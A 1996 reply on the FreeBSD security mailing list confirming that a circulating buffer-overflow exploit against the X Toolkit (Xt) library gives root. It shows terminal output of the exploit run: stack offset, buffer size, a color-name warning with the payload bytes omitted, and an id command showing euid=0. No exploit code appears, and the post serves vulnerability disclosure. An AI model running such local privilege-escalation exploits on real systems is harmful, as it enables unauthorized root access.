Date:      Sun, 25 Aug 1996 13:48:21 +0200
From:      roberto@keltia.freenix.fr (Ollivier Robert)
To:        freebsd-security@FreeBSD.ORG
Cc:        security-officer@FreeBSD.ORG
Subject:   Re: Vulnerability in the Xt library (fwd)
Message-ID:  <199608251148.NAA25686@keltia.freenix.fr>
In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500
References:  	<199608250605.BAA22181@gwydion.hns.st-louis.mo.us>

According to Kent Hamilton:
> Thought this might be of interest.

I confirm that it works like a charm here :-(

357 [13:44] roberto@keltia:~/src/C> ./exploit
Using offset of esp + 0 (efbfd3b0)
Buffer size 1491
Warning: Color name "[non-printable payload bytes omitted]"
# id
uid=101(roberto) euid=0(root) gid=10(staff) groups=10(staff), 0(wheel), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list), 100(copains), 117(dialer), 2000(dos), 2001(tex)

I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I
recall.

-- 
Ollivier ROBERT    -=- The daemon is FREE! -=-    roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996
